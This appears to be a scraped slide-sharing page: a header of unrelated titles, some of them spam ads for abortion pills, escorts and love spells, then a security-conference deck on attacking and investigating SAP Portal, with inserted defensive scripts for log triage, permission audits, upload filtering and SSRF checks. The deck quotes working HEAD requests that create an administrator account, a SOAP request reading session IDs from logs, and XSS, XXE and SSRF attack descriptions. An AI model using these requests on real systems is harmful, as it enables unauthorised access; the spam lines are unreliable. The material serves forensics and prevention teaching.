Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT  - Elevating Productivity in Today's Agile EnvironmentHarnessing ChatGPT  - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 

SAP portal: breaking and forensicating

  • 1. Invest in security to secure investments
    SAP Portal: Hacking and forensics
    Dmitry Chastukhin – Director of SAP pentest/research team
    Evgeny Neyolov – Security analyst, (anti)forensics research
  • 2. About ERPScan
    • The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
    • Leader by the number of acknowledgements from SAP (150+)
    • 60+ presentations at key security conferences worldwide
    • 25 awards and nominations
    • Research team - 20 experts with experience in different areas of security
    • Headquarters in Palo Alto (US) and Amsterdam (EU)
  • 3. Agenda
    • SAP security
    • SAP forensics WTF?!
    • Say hello to SAP Portal
    • Breaking SAP Portal
    • Catch me if you can
    • Conclusion
  • 4. SAP
    • The most popular business application
    • More than 180000 customers worldwide
    • More than 70% of Forbes 500 run SAP
    • More than 40% of ERP market in Poland
  • 5. SAP security
    Espionage
    • Stealing financial information
    • Stealing corporate secrets
    • Stealing supplier and customer lists
    • Stealing HR data
    Fraud
    • False transactions
    • Modification of master data
    Sabotage
    • Denial of service
    • Modification of financial reports
    • Access to technology network (SCADA) by trust relations
  • 6. SAP security
    [Chart: count per year (scale 0–35) for 2003–2013]
    • BlackHat
    • Defcon
    • HITB
    • RSA
    • CONFidence
    • DeepSec
    • Hacktivity
    • Troopers
    • Source
    Source: SAP Security in Figures 2013 LINK
  • 7. Is it remotely exploitable?
    5000+ non-web SAP services exposed in the world, including Dispatcher, Message server, SapHostControl, etc.
    sapscan.com
  • 8. SAP Security notes
    [Chart: SAP Security notes per year (scale 0–900) for 2001–2014]
    By 2014 - 2800 SAP Security notes
  • 9. What about other services?
    [Chart: scale 0–9; series: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd, World]
  • 10. What about unpublished threats?
    • Companies are not interested in publishing information about their breaches
    • There are a lot of internal breaches thanks to unnecessarily given authorizations (an employee by mistake buys hundreds of excavators instead of ten)
    • There are known stories about backdoors left by developers in custom ABAP code
    • How can you be sure that, if a breach occurs, you can find evidence?
  • 11. SAP Forensics
    If there are no attacks, it doesn't mean anything
    • Companies don't like to share it
    • Companies don't use security audit ~10%
    • Even if used, nobody manages it ~5%
    • Even if managed, no correlation ~1%
  • 12. Typical SAP audit options
    • ICM log icm/HTTP/logging_0 70%
    • Security audit log in ABAP 10%
    • Table access logging rec/client 4%
    • Message Server log ms/audit 2%
    • SAP Gateway access log 2%
    * The percentage of companies is based on our security assessments and product implementations.
  • 13. What do we see?
    • A lot of research
    • Real attacks
    • Lack of logging practice
    • Many vulnerabilities are hard to close → we need to monitor them, at least
  • 14. What do we need to monitor? External attacks on SAP
    * Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas.
    • Attack users and SAP GUI: awareness
    • SAProuter: secure configuration and patch management
    • Exposed SAP services: disable them
    • SAP Portal and WEB: too many issues and custom configuration; can be 0-days; need to concentrate on this area
  • 15. Say hello to Portal
    • Point of web access to SAP systems
    • Point of web access to other corporate systems
    • Way for attackers to get access to SAP from the Internet
  • 17. Okay, okay. SAP Portal is important, and it has many links to other modules. So what?
  • 18. SAP Logging
    "If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead)."
    SOURCE: SAP HELP
    * Not the only… There are many complex attacks with POST requests.
  • 19. SAP J2EE Logging
    • Categories of system events recording:
      – System – all system related security and administrative logs
      – Applications – all system events related to business logic
      – Performance – reserved for single activity tracing
    • Default location of these files in your file system: \usr\sap\<sid>\<id>\j2ee\cluster\<node>\log
  • 20. SAP J2EE Logging
    • The developer trace files of the Java instance: <SID>\<instance name>\work
    • The developer trace files of the central services: <SID>\<instance name>\work and <SID>\<instance name>\log
    • Java server logs: <SID>\<instance name>\j2ee\cluster\server<n>\log
  • 21. Full logging is not always the best option
  • 23. SAP Management Console
    • SAP MMC: centralized system management
    • SAP MMC has remote commands
    • Commands are simple SOAP requests
    • They allow seeing the trace and log messages
    • It's not bad if you only use it sometimes and delete logs after use, but…
  • 24. SAP Management Console
    What can we find in logs? Right! The file userinterface.log contains the calculated JSESSIONID.
    But… the attacker must have credentials to read the log file. WRONG!
  • 25. SAP Management Console
    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
      <SOAP-ENV:Header>
        <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
          <enableSession>true</enableSession>
        </sapsess:Session>
      </SOAP-ENV:Header>
      <SOAP-ENV:Body>
        <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
          <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
          <filter/>
          <language/>
          <maxentries>%COUNT%</maxentries>
          <statecookie>EOF</statecookie>
        </ns1:ReadLogFile>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
  • 26. Prevention
    LINK to SAP HELP
    • Don't use TRACE_LEVEL = 3
    • Delete traces when work is finished
    • Limit access to dangerous methods
    • Install notes 927637 and 1439348
    • Mask security-sensitive data in HTTP access log
  • 27. Prevention
    LINK to SAP HELP
    • The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
    • By default, only for the headers listed below
      – Path Parameter: jsessionid
      – Request Parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
      – HTTP Headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
  • 29. Access Control
    • Web Dynpro - programmatic
    • Portal iViews - programmatic
    • J2EE Web apps - declarative
    Programmatic: by UME. Declarative: by WEB.XML
  • 30. Access Control
    • The central entity in the J2EE authorization model is the security role
    • Programmers define the application-specific roles in the J2EE deployment descriptor: web.xml and web-j2ee-engine.xml
  • 32. Verb Tampering
    • If we are trying to get access to an application using GET – we need a login:pass and administrator role
    • What if we try to get access to the application using HEAD instead of GET?
    • PROFIT!
    • Did U know about ctc?
  • 33. Verb Tampering
    Need Admin account in SAP Portal? Just send two HEAD requests
    • Create new user CONF:idence
      HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
    • Add the user CONF to the group Administrators
      HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
    * Works when UME uses JAVA database.
  • 34. Prevention
    • Install SAP notes 1503579, 1616259, 1589525, 1624450
    • Install other SAP notes about Verb Tampering
    • Scan applications with ERPScan WEB.XML checker
    • Disable the applications that are not necessary
  • 35. Investigation
    [Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
    [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
    [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
    j2ee\cluster\<node>\log\system\httpaccess\responses.trc
  • 37. Invoker Servlet
    • Want to execute an OS command on J2EE server remotely?
    • Maybe upload a backdoor in a Java class?
    • Or sniff all traffic?
    Still remember ctc?
  • 38. Invoker Servlet
  • 39. Prevention
    • Update to the latest patch: 1467771, 1445998
    • "EnableInvokerServletGlobally" must be "false"
    • Check all WEB.XML files with ERPScan WEBXML checker
  • 40. Investigation
    #1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl: 3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#
    #1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl: 3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
  • 42. XSS
    • Many XSSs in Portal
    • But sometimes HttpOnly
    • But when we exploit XSS, we can use the features of SAP Portal: EPCF
  • 43. EPCF
    • EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
    • Enterprise Portal Client Manager (EPCM)
    • iViews can access the EPCM object from every portal page or IFrame
    • Every iView contains the EPCM object
    For example, EPCF is used as a transient user data buffer for iViews:
    <SCRIPT>
      alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
    </SCRIPT>
  • 44. Prevention
    • Install SAP note 1656549
  • 45. Investigation
    #Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
    j2ee\cluster\<node>\log\system\httpaccess\responses.trc
  • 46. Web Dynpro JAVA
    • Web Dynpro unauthorized modifications
    • For example:
      – somebody steals an account using XSS/CSRF/sniffing
      – then tries to modify the severity level of logs
  • 47. Web Dynpro JAVA
    LINK to SAP HELP
  • 48. Investigation
    • No traces of change in default log files: cluster\server0\log\system\httpaccess\responses.log
    • Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
    • But sometimes we can find information by indirect signs:
      [Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
    • The client loaded images from the server during some changes
  • 49. Investigation
    • Most actions have icons
    • They have to be loaded from the server
    • Usually, legitimate users have them all in cache
    • Attackers usually don't have them, so they make requests to the server
    • That's how we can identify potentially malicious actions
    • But there should be correlation with a real user's activity
    • False positives are possible:
      – New legitimate user
      – Old user clears cache
      – Other
  • 51. Directory traversal fix bypass
  • 52. Prevention
    • Install SAP note 1630293
  • 54. Breaking SAP Portal
    • Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
    • Found a file in the OS of SAP Portal with keys to decrypt passwords
    • Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
    • Decrypt passwords and log into Portal
    • PROFIT!
  • 55. Read the file
    How can we read the file?
    • Directory Traversal
    • OS Command execution
    • XML External Entity (XXE)
  • 56. XXE in Portal: Details
    • Injection of malicious requests into XML packets
    • Can lead to unauthorized file read, DoS, SSRF
    • There is an XXE vulnerability in SAP Portal
    • Can be exploited by modification of a POST request
    • It is possible to read any file from the OS and much more
  • 57. XXE  in  Portal           57  
  • 58. XXE  in  Portal           58  
  • 59. XXE   59   Error  based  XXE  
  • 60. XXE  in  Portal:  Result     •  We  can  read  any  file   •  Including  config  with  passwords   •  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB;  its   password  is  here:   usrsap<SID>SYSglobalsecuritydataSecStore.properties 60  
• 65. Get the password
•  We have an encrypted password
•  We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
• 66. Prevention
•  Install SAP note 1619539
•  Restrict read access to files SecStore.properties and SecStore.key
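The second bullet is a file-permission question, so here is an added check for it (example code written for this page, not ERPScan's or SAP's). It assumes the usual /usr/sap/<SID>/SYS/global/security/data location of the two secure-store files and reports anything that lets group or other users read or write them; the throw-away sample file helper exists only so the audit can be exercised offline.

```python
"""Audit the permissions of the J2EE secure store files (constructed example)."""
import os
import stat
import tempfile

# Assumed default layout; <SID> is replaced by the real system id at run time.
SECSTORE_FILES = [
    "/usr/sap/<SID>/SYS/global/security/data/SecStore.properties",
    "/usr/sap/<SID>/SYS/global/security/data/SecStore.key",
]


def audit_permissions(path, expected_uid=None):
    """Return a list of findings for one file; an empty list means owner-only access."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: not found"]
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path}: readable by group/others (mode {mode:04o})")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: writable by group/others (mode {mode:04o})")
    if expected_uid is not None and st.st_uid != expected_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, expected {expected_uid}")
    return findings


def audit_secstore(sid, expected_uid=None, files=SECSTORE_FILES):
    """Run the audit over both secure-store files of one system id."""
    return [f for p in files for f in audit_permissions(p.replace("<SID>", sid), expected_uid)]


def make_sample_file(mode):
    """Create a throw-away file with the given mode so the audit can be tried offline.
    The content is a constructed placeholder, not a real secure store."""
    fd, path = tempfile.mkstemp(prefix="secstore-demo-")
    os.write(fd, b"constructed placeholder, not a real secure store\n")
    os.close(fd)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for finding in audit_permissions(make_sample_file(0o644)):
        print(finding)
```

Run it as the <SID>adm user with `expected_uid` set to that account's uid; the expected result on a hardened system is an empty list for both files.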
• 68. Investigation
•  The only way to get HTTP POST request values is to enable HTTP Trace
•  Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable
•  For 6.4 and 7.0 SP12 and lower:
   –  On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
   –  On Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
•  For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
•  Manually analyze all requests for XXE attacks
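The last bullet asks for manual review of every traced request. The added example below (mine, not from the slides) automates the first pass: it flags request bodies that carry a DOCTYPE or an external entity declaration, and it re-parses each body with an expat parser that refuses any entity declaration, which is also the setting a hardened endpoint should run with. The trace file layout is not shown on the slides, so a list of (client, body) pairs stands in for the parsed trace, and the hostile body is constructed with a placeholder file name.

```python
"""Triage HTTP trace request bodies for XXE indicators (constructed example)."""
import re
import xml.parsers.expat

# Constructed trace excerpt: one benign and one hostile POST body.
TRACE_BODIES = [
    ("10.0.0.5", '<?xml version="1.0"?><request><user>jdoe</user></request>'),
    ("10.0.0.9", '<?xml version="1.0"?>'
                 '<!DOCTYPE r [<!ENTITY ext SYSTEM "file:///tmp/constructed-sample.txt">]>'
                 '<request><user>&ext;</user></request>'),
]

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def xxe_indicators(body):
    """Static triage: reasons why the body looks like an XXE attempt (empty if clean)."""
    reasons = []
    if DOCTYPE_RE.search(body):
        reasons.append("DOCTYPE declaration in request body")
    if EXTERNAL_ENTITY_RE.search(body):
        reasons.append("external (SYSTEM/PUBLIC) entity declaration")
    return reasons


class EntityForbidden(Exception):
    """Raised as soon as the parser sees any entity declaration."""


def parse_without_entities(body):
    """Parse XML while refusing every entity declaration; returns the element names seen."""
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def forbid(name, is_param, value, base, system_id, public_id, notation):
        raise EntityForbidden(f"entity {name!r} declared")

    parser.EntityDeclHandler = forbid          # fires before any entity can be used
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(body, True)
    return names


def triage_trace(bodies):
    """Return [(client, reasons)] for every traced body that deserves a look."""
    findings = []
    for client, body in bodies:
        reasons = xxe_indicators(body)
        try:
            parse_without_entities(body)
        except EntityForbidden as exc:
            reasons.append(f"rejected by hardened parser: {exc}")
        except xml.parsers.expat.ExpatError as exc:
            reasons.append(f"malformed XML: {exc}")
        if reasons:
            findings.append((client, reasons))
    return findings


if __name__ == "__main__":
    for client, reasons in triage_trace(TRACE_BODIES):
        print(client, "->", "; ".join(reasons))
```

The static regexes catch attempts that never reach a parser (for example bodies logged with a 4xx status), while the expat hook is the same mechanism a defensive XML parser uses in production: rejecting at the declaration means no entity, internal or external, is ever expanded.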
• 69. Malicious file upload: Attack
•  Knowledge Management allows uploading to the server different types of files that can store malicious content
•  Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
•  For example, it can be an HTML file with JavaScript that steals cookies
• 70. Malicious file upload: Attack
• 71. Malicious file upload: Attack
• 72. Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
*Again, images can help us.
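Both the admin-icon observation of slides 48 and 49 and the upload correlation of slide 72 can be scripted over responses.log. The added example below is mine, not the presenters' tooling; it parses the responses.log line layout the slides show, flags icon fetches from administration Web Dynpro applications (a client that had to load the icon had no cached copy, and the slides' false-positive cases are surfaced through a known-client baseline), and pairs a Knowledge Management document POST with the MIME-type icon GET that follows it from the same client. The sample log is constructed; only the three request lines quoted on the slides are real.

```python
"""Indirect forensic indicators in SAP Portal responses.log (constructed sample)."""
import re
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^\[(?P<ts>.+?)\s*\]\s*-\s*(?P<ip>\S+)\s*:\s*(?P<method>[A-Z]+)\s+"
    r"(?P<path>\S+)\s+HTTP/[\d.]+\s+(?P<status>\d{3})\s+(?P<size>\d+)"
)
TS_FMT = "%b %d, %Y %I:%M:%S %p"

# Constructed log excerpt in the responses.log layout shown on the slides.
SAMPLE_LOG = """\
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Mar 20, 2013 9:40:02 AM ] - 172.16.0.40 : GET /irj/portal HTTP/1.1 200 5120
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
"""


def parse_log(text):
    """Turn responses.log text into a list of dicts sorted as they appear in the file."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access record
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"].strip(), TS_FMT)
        ev["status"], ev["size"] = int(ev["status"]), int(ev["size"])
        events.append(ev)
    return events


# Icons served from administration Web Dynpro applications ("webadmin" in the path).
ADMIN_ICON_RE = re.compile(r"webadmin.*\.(gif|png)$", re.IGNORECASE)


def admin_icon_loads(events, known_admin_ips=frozenset()):
    """Slides 48/49: an admin-tool icon fetched from the server means the client had no
    cached copy. Returns (ip, timestamp, path, note); the note ranks the false-positive risk."""
    hits = []
    for ev in events:
        if ev["method"] == "GET" and ADMIN_ICON_RE.search(ev["path"]):
            if ev["ip"] in known_admin_ips:
                note = "known admin client: possible cache clear or new browser"
            else:
                note = "client never seen in the admin tool before: investigate"
            hits.append((ev["ip"], ev["ts"], ev["path"], note))
    return hits


UPLOAD_RE = re.compile(r"com\.sap\.km\..*DocsExplorer/documents$")
KM_ICON_RE = re.compile(r"^/irj/go/km/docs/.*/mimes/images/(?P<kind>\w+)\.gif$")


def km_uploads(events, window=timedelta(seconds=30)):
    """Slide 72: a KM document POST followed by the MIME-type icon GET from the same
    client reveals the type of the uploaded file. Returns (ip, timestamp, kind)."""
    findings = []
    for i, ev in enumerate(events):
        if ev["method"] != "POST" or not UPLOAD_RE.search(ev["path"]):
            continue
        kind = "unknown"
        for later in events[i + 1:]:
            if later["ts"] - ev["ts"] > window:
                break
            if later["ip"] == ev["ip"] and later["method"] == "GET":
                m = KM_ICON_RE.match(later["path"])
                if m:
                    kind = m.group("kind")
                    break
        findings.append((ev["ip"], ev["ts"], kind))
    return findings


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print(admin_icon_loads(evs))
    print(km_uploads(evs))
```

The baseline set for `admin_icon_loads` is the correlation the slides call for: build it from addresses that legitimately used the administration tools in earlier, trusted log periods, so that a new legitimate administrator or a cleared cache is reported at lower priority rather than hidden.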
• 73. Malicious file upload: Prevention
Enable File Extension and Size Filter:
•  System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
•  Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter
• 74. Malicious file upload: Prevention
Enable Malicious Script Filter:
•  System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
•  The filter also detects executable scripts in files that are being modified and encodes them when they are saved
   –  Enable Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied
   –  Enable the Send E-Mail to Administrator option
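To make the two filters on slides 73 and 74 concrete, here is an added example of the same logic in code (written for this page; it is not SAP's implementation and does not touch the Portal). The extension allow-list and 5 MiB cap are assumed policy values, the forbidden-script list follows the comma-separated form the filter UI uses, and the administrator notice is returned as text in place of the e-mail.

```python
"""Upload filtering modelled on the KM File Extension/Size and Malicious Script filters
(constructed example)."""
import html
import re

ALLOWED_EXTENSIONS = {"pdf", "docx", "xlsx", "txt", "png", "jpg"}   # assumed policy
MAX_SIZE = 5 * 1024 * 1024                                          # assumed 5 MiB cap
FORBIDDEN_SCRIPTS = "script,iframe,object,embed"   # comma-separated, as in the filter UI


def _tag_re(forbidden):
    """Compile the comma-separated tag list into one regex matching opening/closing tags."""
    tags = "|".join(re.escape(t.strip()) for t in forbidden.split(",") if t.strip())
    return re.compile(rf"</?\s*({tags})\b[^>]*>", re.IGNORECASE)


def check_extension_and_size(filename, size, allowed=ALLOWED_EXTENSIONS, max_size=MAX_SIZE):
    """File Extension and Size Filter: None if acceptable, otherwise a rejection reason."""
    name = filename.rsplit("/", 1)[-1]
    if "." not in name:
        return "file has no extension"
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in allowed:
        return f"extension '.{ext}' is not on the allow-list"
    if size > max_size:
        return f"size {size} exceeds limit {max_size}"
    return None


def encode_forbidden_scripts(content, forbidden=FORBIDDEN_SCRIPTS):
    """Malicious Script Filter: banned tags are HTML-encoded so the stored document
    cannot execute them when served back. Returns (encoded_text, tags_encoded)."""
    pattern = _tag_re(forbidden)
    count = 0

    def encode(match):
        nonlocal count
        count += 1
        return html.escape(match.group(0))

    return pattern.sub(encode, content), count


def filter_upload(filename, size, content, client, forbidden=FORBIDDEN_SCRIPTS):
    """Apply both filters to one upload and build the administrator notice if needed."""
    reason = check_extension_and_size(filename, size)
    if reason:
        return {"accepted": False, "reason": reason, "content": None, "encoded": 0, "alert": None}
    cleaned, count = encode_forbidden_scripts(content, forbidden)
    alert = None
    if count:
        alert = f"KM upload '{filename}' from {client}: {count} forbidden script tag(s) encoded"
    return {"accepted": True, "reason": None, "content": cleaned, "encoded": count, "alert": alert}


if __name__ == "__main__":
    print(filter_upload("notes.txt", 50, '<b>x</b><iframe src="a"></iframe>', "10.0.0.9"))
    print(filter_upload("page.html", 10, "", "10.0.0.9"))
```

Note the order: the extension filter runs first, so an HTML upload never reaches the script filter at all, and the script filter still matters for allowed text-like types that a browser might render.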
• 75. Portal post-exploitation
•  Lots of links to other systems in the corporate LAN
•  Using SSRF, attackers can get access to these systems
What is SSRF?
• 76. SSRF History: Basics
•  We send Packet A to Service A
•  Service A initiates Packet B to Service B
•  Services can be on the same or different hosts
•  We can manipulate some fields of Packet B within Packet A
•  Various SSRF attacks depend on how many fields we can control in Packet B
[diagram: Packet A, Packet B]
• 77. Partial Remote SSRF: HTTP attacks on other services
[diagram: (A) direct attack, GET /vuln.jsp, against the HTTP server; (B) SSRF attack reaching the corporate network through the HTTP server]
• 78. Gopher URI scheme
•  Using the gopher:// URI scheme, it is possible to send TCP packets
   –  Exploit OS vulnerabilities
   –  Exploit old SAP application vulnerabilities
   –  Bypass SAP security restrictions
   –  Exploit vulnerabilities in local services
More info in our BH2012 presentation: SSRF vs. Business Critical Applications
LINK
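The three SSRF slides describe what an attacker gains when a server-side fetch accepts arbitrary schemes and hosts. The added example below is the corresponding control (my code, not part of the presentation or of SAP Portal): a policy function that a portal component fetching URLs on a user's behalf would call before connecting. It accepts only http/https, refuses credentials in the URL, literal addresses in private, loopback or link-local ranges, ports other than 80/443, and any host not on an assumed allow-list.

```python
"""Outbound-URL policy for server-side fetches (constructed defender-side example)."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"content.example.internal", "feeds.example.com"}   # assumed allow-list
ALLOWED_PORTS = {None, 80, 443}


def is_internal_address(host):
    """True for literal IPs that must never be reached from a user-supplied URL."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False  # a hostname, not a literal address
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast)


def check_outbound_url(url):
    """Return (allowed, reason) for a URL the server is asked to fetch."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme '{scheme}' not permitted (only http/https)"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname or ""
    if not host:
        return False, "no host"
    if is_internal_address(host):
        return False, f"literal internal address {host}"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not permitted"
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host '{host}' not on allow-list"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("https://feeds.example.com/rss", "gopher://feeds.example.com:70/x",
                      "http://127.0.0.1:50000/", "http://other.example.com/"):
        print(candidate, "->", check_outbound_url(candidate))
```

One caveat the offline check cannot cover: an allow-listed hostname can still resolve to an internal address, so the same `is_internal_address` test should be applied to the resolved address immediately before connecting, and redirects must be re-checked with the same function.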
• 81. Anti-forensics
•  Flooding
